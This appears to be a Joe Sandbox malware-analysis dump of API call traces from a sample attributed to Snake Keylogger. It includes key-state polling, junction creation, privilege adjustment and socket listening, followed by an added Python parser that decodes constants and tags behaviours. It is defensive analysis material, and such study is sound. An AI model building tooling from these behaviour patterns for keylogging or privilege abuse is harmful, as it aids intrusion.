                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                        • String ID:
                                                                        • API String ID: 3996160137-0
                                                                        • Opcode ID: e2b2b9502f63a260f67a4198651eeefa820fc98edbdfccdb3c7fd1bede2680b2
                                                                        • Instruction ID: c20cc1e22be297e6c547482384c90c8e3251d473e41ef045ecdaf1357e3239d3
                                                                        • Opcode Fuzzy Hash: e2b2b9502f63a260f67a4198651eeefa820fc98edbdfccdb3c7fd1bede2680b2
                                                                        • Instruction Fuzzy Hash: 53615D71A0424AEFEF01DFA5DC44AEEBB79FF09700F048269E915E6291DB319E05DB60
                                                                        APIs
                                                                        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 008FA20F
                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 008FA26E
                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 008FA293
                                                                        • _memset.LIBCMT ref: 008FA2B2
                                                                        • _wcsncpy.LIBCMT ref: 008FA2EE
                                                                        • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 008FA323
                                                                        • CloseHandle.KERNEL32(00000000), ref: 008FA32E
                                                                        • RemoveDirectoryW.KERNEL32(?), ref: 008FA337
                                                                        • CloseHandle.KERNEL32(00000000), ref: 008FA341
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_memset_wcsncpy
                                                                        • String ID: :$\$\??\%s
                                                                        • API String ID: 3670377745-3457252023
                                                                        • Opcode ID: 5f7592f7c29a8ab3727d1887683ff8e47bcbb5b89a71875b1145b5568f8c18e0
                                                                        • Instruction ID: fedb149d582e989c7309d73476ca4337b3c2f027ac0b0667a92e4327a5b2c8de
                                                                        • Opcode Fuzzy Hash: 5f7592f7c29a8ab3727d1887683ff8e47bcbb5b89a71875b1145b5568f8c18e0
                                                                        • Instruction Fuzzy Hash: 43319FB160410DABDB209FA4DC49FEB37BCFF89750F1041B6FA08D2260EA7096458B25
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                        • API String ID: 0-4052911093
                                                                        • Opcode ID: a68a8ba3bf803e92e3ca0c537159b6de4a83c00f7392631c4f797f7bcfe9c252
                                                                        • Instruction ID: 0af1226d8602fbcdb849fefbba3dc9c91d468c617867c57901636d7932e2bf3f
                                                                        • Opcode Fuzzy Hash: a68a8ba3bf803e92e3ca0c537159b6de4a83c00f7392631c4f797f7bcfe9c252
                                                                        • Instruction Fuzzy Hash: 0A729171E00219DBDF24CF59C8847AEB7B5FF49314F14816AE909EB694EB349D81CB90
                                                                        APIs
                                                                        • GetKeyboardState.USER32(?), ref: 008F0097
                                                                        • SetKeyboardState.USER32(?), ref: 008F0102
                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 008F0122
                                                                        • GetKeyState.USER32(000000A0), ref: 008F0139
                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 008F0168
                                                                        • GetKeyState.USER32(000000A1), ref: 008F0179
                                                                        • GetAsyncKeyState.USER32(00000011), ref: 008F01A5
                                                                        • GetKeyState.USER32(00000011), ref: 008F01B3
                                                                        • GetAsyncKeyState.USER32(00000012), ref: 008F01DC
                                                                        • GetKeyState.USER32(00000012), ref: 008F01EA
                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 008F0213
                                                                        • GetKeyState.USER32(0000005B), ref: 008F0221
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: State$Async$Keyboard
                                                                        • String ID:
                                                                        • API String ID: 541375521-0
                                                                        • Opcode ID: c4517f576748b98da35926d34796e6d24b7178a487b0a6d2b19b77a640e83cee
                                                                        • Instruction ID: 72dcde66688f0dad9a7d42d88dbdca0b46ac708aaa4b7bb0bf7c75a31967ce70
                                                                        • Opcode Fuzzy Hash: c4517f576748b98da35926d34796e6d24b7178a487b0a6d2b19b77a640e83cee
                                                                        • Instruction Fuzzy Hash: 7051CA2090478C5DFB35DBB489547FABFB5EF01380F08459996C59A1C3DA649A8CCF62
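Three of the function blocks above print arguments that are worth decoding before drawing conclusions: the CreateFileW/DeviceIoControl block at 008FA20F..008FA341, the GetAsyncKeyState/GetKeyState block at 008F0097..008F0221, and the GetUserObjectSecurity/AddAce/SetUserObjectSecurity block at 008E7D13..008E7E77. In the first, the DeviceIoControl control code 000900A4 is FSCTL_SET_REPARSE_POINT, the CreateFileW arguments are GENERIC_WRITE (40000000), OPEN_EXISTING (00000003) and FILE_FLAG_BACKUP_SEMANTICS|FILE_FLAG_OPEN_REPARSE_POINT (02200000), and the "\??\%s" string is the NT-path prefix used in a reparse buffer's substitute name: taken together, a directory is created, opened as a reparse point and turned into a junction, with the trailing RemoveDirectoryW consistent with cleanup on failure. In the second, the virtual-key codes 000000A0, 000000A1, 00000011, 00000012 and 0000005B are VK_LSHIFT, VK_RSHIFT, VK_CONTROL, VK_MENU (Alt) and VK_LWIN. In the third, the SECURITY_INFORMATION value 00000004 passed to GetUserObjectSecurity and SetUserObjectSecurity is DACL_SECURITY_INFORMATION, so the function reads, extends and writes back the DACL of a window station or desktop object. The Python below is an added example for reading this report, not Joe Sandbox code and not the sample's code: it parses trace lines in the report's own format, names those constants and tags each block. The `block_*` names and tag names are the example's own, the constant tables cover only the values these blocks use, and the trace text is constructed from the lines shown above.

```python
"""Decode and tag Joe Sandbox API-trace lines (added example, not Joe Sandbox or sample code)."""
import re
from dataclasses import dataclass, field

# Constructed input: three of the function blocks on this page, trace lines copied verbatim.
SAMPLE_BLOCKS = {
    "block_reparse": """
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 008FA293
• _memset.LIBCMT ref: 008FA2B2
• DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 008FA323
""",
    "block_keys": """
• GetAsyncKeyState.USER32(000000A0), ref: 008F0122
• GetAsyncKeyState.USER32(000000A1), ref: 008F0168
• GetAsyncKeyState.USER32(00000011), ref: 008F01A5
• GetAsyncKeyState.USER32(00000012), ref: 008F01DC
• GetAsyncKeyState.USER32(0000005B), ref: 008F0213
""",
    "block_dacl": """
  • Part of subcall function 008E8202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 008E821E
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 008E7E63
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 008E7E77
""",
}
# One trace line: "<api>.<module>(<args>), ref: <addr>"; LIBCMT entries carry no argument list.
LINE_RE = re.compile(r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9]+)"
                     r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
# Win32 constants, limited to the values these blocks use.
FSCTL = {0x000900A4: "FSCTL_SET_REPARSE_POINT"}
VK = {0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN"}
SECINFO = {1: "OWNER", 2: "GROUP", 4: "DACL", 8: "SACL"}
ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING", 4: "OPEN_ALWAYS"}
FILE_FLAGS = {0x02000000: "FILE_FLAG_BACKUP_SEMANTICS", 0x00200000: "FILE_FLAG_OPEN_REPARSE_POINT"}

@dataclass
class Call:
    api: str
    module: str
    args: list          # int for hex values, None where the plugin printed '?', str otherwise
    ref: int
    notes: list = field(default_factory=list)

def _arg(tok):
    tok = tok.strip()
    return None if tok == "?" else int(tok, 16) if re.fullmatch(r"-?[0-9A-Fa-f]{1,8}", tok) else tok

def parse_trace(text):
    calls = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if m:
            args = [_arg(t) for t in m["args"].split(",")] if m["args"] else []
            calls.append(Call(m["api"], m["mod"], args, int(m["ref"], 16)))
    return calls

def _flags(value, table):
    names = [n for bit, n in table.items() if value & bit]
    rest = value & ~sum(table)           # bits not covered by the table stay visible as hex
    return "|".join(names + ([f"0x{rest:08X}"] if rest else [])) or "0"

def decode(call):
    """Attach symbolic names to the hex arguments; '?' and string arguments are left alone."""
    a = [x if isinstance(x, int) else None for x in call.args] + [None] * 8   # pad for indexing
    if call.api == "CreateFileW":
        if a[1] is not None:
            call.notes.append("access=" + _flags(a[1], ACCESS))
        if a[4] is not None:
            call.notes.append("disposition=" + DISPOSITION.get(a[4], hex(a[4])))
        if a[5] is not None:
            call.notes.append("flags=" + _flags(a[5], FILE_FLAGS))
    elif call.api == "DeviceIoControl" and a[1] is not None:
        call.notes.append("ioctl=" + FSCTL.get(a[1], f"0x{a[1]:08X}"))
    elif call.api in ("GetAsyncKeyState", "GetKeyState") and a[0] is not None:
        call.notes.append("vk=" + VK.get(a[0], f"0x{a[0]:02X}"))
    elif call.api.endswith("UserObjectSecurity") and a[1] is not None:
        call.notes.append("secinfo=" + _flags(a[1], SECINFO))
    return call

def classify(calls):
    """Tag one block by behaviour; tags are triage hints, not verdicts (see the note below)."""
    tags = set()
    keys = {c.args[0] for c in calls
            if c.api in ("GetAsyncKeyState", "GetKeyState") and c.args and isinstance(c.args[0], int)}
    if len(keys) >= 3:   # only modifiers polled is send-keys behaviour; a wider range is a key scanner
        tags.add("polls_modifier_keys" if keys <= set(VK) else "scans_keyboard")
    if any(c.api == "DeviceIoControl" and len(c.args) > 1 and c.args[1] in FSCTL for c in calls):
        tags.add("sets_reparse_point")
    if any(c.api == "SetSecurityDescriptorDacl" for c in calls) and any(
            c.api == "SetUserObjectSecurity" and len(c.args) > 1
            and isinstance(c.args[1], int) and c.args[1] & 4 for c in calls):
        tags.add("rewrites_userobject_dacl")
    return tags

def triage(blocks):
    result = {}
    for name, text in blocks.items():
        calls = [decode(c) for c in parse_trace(text)]
        result[name] = (calls, classify(calls))   # name -> (decoded calls, tags)
    return result
```

Calling `triage(SAMPLE_BLOCKS)` yields `sets_reparse_point`, `polls_modifier_keys` and `rewrites_userobject_dacl` for the three blocks respectively. Read the tags as hints: the report marks the sample as a likely compiled AutoIt script, so code in the main module at 00890000 is largely the interpreter's own runtime rather than the embedded script, and a routine that checks only the modifier keys is what a send-keys helper does, whereas a keylogger scans a far wider key range (that case is the `scans_keyboard` tag). The memory-resident payload that Joe Sandbox actually attributes to Snake Keylogger lives in other processes and dumps, not in these blocks.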
                                                                        APIs
                                                                          • Part of subcall function 00910E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0090FDAD,?,?), ref: 00910E31
                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009104AC
                                                                          • Part of subcall function 00899837: __itow.LIBCMT ref: 00899862
                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0091054B
                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 009105E3
                                                                        • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00910822
                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0091082F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow
                                                                        • String ID:
                                                                        • API String ID: 2014801545-0
                                                                        • Opcode ID: e72e6d3f4060d5d44aa54a46a1c475b8c994be0133c410b9897ce12726dc9a27
                                                                        • Instruction ID: 9ce6255aea90c111dd4d14d848e7b2c5a58ed1ab2be4ab1ce8f729ebceff0994
                                                                        • Opcode Fuzzy Hash: e72e6d3f4060d5d44aa54a46a1c475b8c994be0133c410b9897ce12726dc9a27
                                                                        • Instruction Fuzzy Hash: 4FE16131604204AFCB14DF28C895E6ABBE9FF89314F04896DF44ADB261D771ED41CB92
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 008FC78D
                                                                        • FindClose.KERNEL32(00000000), ref: 008FC7E1
                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 008FC806
                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 008FC81D
                                                                          • Part of subcall function 00897DE1: _memmove.LIBCMT ref: 00897E22
                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 008FC844
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: FileTime$FindLocal$CloseFirstSystem_memmove
                                                                        • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                        • API String ID: 2127821509-2428617273
                                                                        • Opcode ID: fa66bfcfaa5e01542275637b1b982a1c68e67c073db02959f768f9451d01801e
                                                                        • Instruction ID: 3eabdec3aef3932d8f117358a1bea0084e61da0ee361da33e8528cb8b8b6a968
                                                                        • Opcode Fuzzy Hash: fa66bfcfaa5e01542275637b1b982a1c68e67c073db02959f768f9451d01801e
                                                                        • Instruction Fuzzy Hash: 2EA11DB1518209ABDB00FBA8C995DAFB7ECFF95704F44092DF595C6151EA30EA08CB63
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                        • String ID:
                                                                        • API String ID: 1737998785-0
                                                                        • Opcode ID: bd9c563860d8f26bd676d031c56fec9fc06ba314b913fb527bf94158c92c5e22
                                                                        • Instruction ID: dcb39267ba9d8d77344ef36a832e67565ec8ed34b1ee7c5eb0e944ddbb3dd54a
                                                                        • Opcode Fuzzy Hash: bd9c563860d8f26bd676d031c56fec9fc06ba314b913fb527bf94158c92c5e22
                                                                        • Instruction Fuzzy Hash: 2A21E2753142189FDB00AF28DC19BAD7BA8FF55351F04C029FA5ADB2A1DB70AC00DB85
                                                                        APIs
                                                                          • Part of subcall function 00894750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00894743,?,?,?,0089715A,?,?,?,?,0089108C), ref: 00894770
                                                                          • Part of subcall function 008F4A31: GetFileAttributesW.KERNEL32(?,008F370B), ref: 008F4A32
                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 008F38A3
                                                                        • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 008F394B
                                                                        • MoveFileW.KERNEL32(?,?), ref: 008F395E
                                                                        • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 008F397B
                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 008F399D
                                                                        • FindClose.KERNEL32(00000000,?,?,?,?), ref: 008F39B9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                        • String ID: \*.*
                                                                        • API String ID: 4002782344-1173974218
                                                                        • Opcode ID: c13b01ca14aa07452e239b1b68c414ec09d8a0e9e4bd59d5029ebbb0f729e238
                                                                        • Instruction ID: a8a9d1b890518423ffa54b7d91f58eae53bd052dda1e3c125c1c67e221f173ba
                                                                        • Opcode Fuzzy Hash: c13b01ca14aa07452e239b1b68c414ec09d8a0e9e4bd59d5029ebbb0f729e238
                                                                        • Instruction Fuzzy Hash: F7517A3190514DAACF06FBB8DA929FDBB78FF11300F644069E406F6191EB616F09CB62
                                                                        APIs
                                                                          • Part of subcall function 00897DE1: _memmove.LIBCMT ref: 00897E22
                                                                        • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 008FF440
                                                                        • Sleep.KERNEL32(0000000A), ref: 008FF470
                                                                        • _wcscmp.LIBCMT ref: 008FF484
                                                                        • _wcscmp.LIBCMT ref: 008FF49F
                                                                        • FindNextFileW.KERNEL32(?,?), ref: 008FF53D
                                                                        • FindClose.KERNEL32(00000000), ref: 008FF553
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                        • String ID: *.*
                                                                        • API String ID: 713712311-438819550
                                                                        • Opcode ID: 3228741fc988bc7eb1f66574bfd706a93079077705672e16e1ae16a398957d9d
                                                                        • Instruction ID: ee0315f2efa603115ff107efaefe0f79cbd8905ef5634ecb0d582ed19542095e
                                                                        • Opcode Fuzzy Hash: 3228741fc988bc7eb1f66574bfd706a93079077705672e16e1ae16a398957d9d
                                                                        • Instruction Fuzzy Hash: BF416D7190420EABCF14EF78DC55AFEBBB4FF09314F144466EA19E2291EB309A44CB51
APIs
Memory Dump Source
• Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
• Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
Similarity
• API ID: _memmove
• String ID:
• API String ID: 4104443479-0
• Opcode ID: 1e6f0b60c4a4b89712e27a657018006d04a53eb8ddc9713e98c706616220f5e9
• Instruction ID: f0b34321d243b4a73c73686a374c50600d9832423228c0188b8bc587cb553105
• Opcode Fuzzy Hash: 1e6f0b60c4a4b89712e27a657018006d04a53eb8ddc9713e98c706616220f5e9
• Instruction Fuzzy Hash: 15129B70A00A0ADFDF14DFA9D981AEEB7F5FF49300F144529E806EB250EB35A951CB51
APIs
  • Part of subcall function 00894750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00894743,?,?,?,0089715A,?,?,?,?,0089108C), ref: 00894770
  • Part of subcall function 008F4A31: GetFileAttributesW.KERNEL32(?,008F370B), ref: 008F4A32
• FindFirstFileW.KERNEL32(?,?), ref: 008F3B89
• DeleteFileW.KERNEL32(?,?,?,?), ref: 008F3BD9
• FindNextFileW.KERNEL32(00000000,00000010), ref: 008F3BEA
• FindClose.KERNEL32(00000000), ref: 008F3C01
• FindClose.KERNEL32(00000000), ref: 008F3C0A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
• Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
Similarity
• API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
• String ID: \*.*
• API String ID: 2649000838-1173974218
• Opcode ID: f3b25d13af7b78d294b5f638a545a2b3f968406e6fc2bf7bdea5275bc821968d
• Instruction ID: 523021f40be8ddd370680e85672d7eedae2bd90ac52d2618b48affd05c1f475f
• Opcode Fuzzy Hash: f3b25d13af7b78d294b5f638a545a2b3f968406e6fc2bf7bdea5275bc821968d
• Instruction Fuzzy Hash: 27316D3101D3899BC701FB68D8A58BFB7A8FE91314F444D2DF4E6D2191EB219A09D763
APIs
  • Part of subcall function 008E87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 008E882B
  • Part of subcall function 008E87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 008E8858
  • Part of subcall function 008E87E1: GetLastError.KERNEL32 ref: 008E8865
• ExitWindowsEx.USER32(?,00000000), ref: 008F51F9
Strings
Memory Dump Source
• Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
• Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
Similarity
• API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
• String ID: $@$SeShutdownPrivilege
• API String ID: 2234035333-194228
• Opcode ID: b33f32dd1df0925a765484159443503acd17584cc318035092fb73e28d7f5070
• Instruction ID: ba157210efa3fbf0bd9956bcd2dbdb36899e624756471696a3ac166d200f3504
• Opcode Fuzzy Hash: b33f32dd1df0925a765484159443503acd17584cc318035092fb73e28d7f5070
• Instruction Fuzzy Hash: 24014E317A5A1D6BF72862789C9BFFB7258FB05344F200625FB17E20D2DB711C0185A1
APIs
• socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 009062DC
• WSAGetLastError.WSOCK32(00000000), ref: 009062EB
• bind.WSOCK32(00000000,?,00000010), ref: 00906307
• listen.WSOCK32(00000000,00000005), ref: 00906316
• WSAGetLastError.WSOCK32(00000000), ref: 00906330
• closesocket.WSOCK32(00000000,00000000), ref: 00906344
Memory Dump Source
• Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
• Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
Similarity
• API ID: ErrorLast$bindclosesocketlistensocket
• String ID:
• API String ID: 1279440585-0
• Opcode ID: d05a9103322d1d15d755a8280beee3266153a66c0a6c174bab3fe0e25141a2cd
• Instruction ID: 692f45f24f09a1c0860fb1dbdc724f0289544057c5d58d60a25ee48ed281afe8
• Opcode Fuzzy Hash: d05a9103322d1d15d755a8280beee3266153a66c0a6c174bab3fe0e25141a2cd
• Instruction Fuzzy Hash: CE219C317002149FCB10EF68C856B6EB7A9EF49720F148169E866E72D1CB70AD11DB92
APIs
  • Part of subcall function 008B0DB6: std::exception::exception.LIBCMT ref: 008B0DEC
  • Part of subcall function 008B0DB6: __CxxThrowException@8.LIBCMT ref: 008B0E01
• _memmove.LIBCMT ref: 008E0258
• _memmove.LIBCMT ref: 008E036D
• _memmove.LIBCMT ref: 008E0414
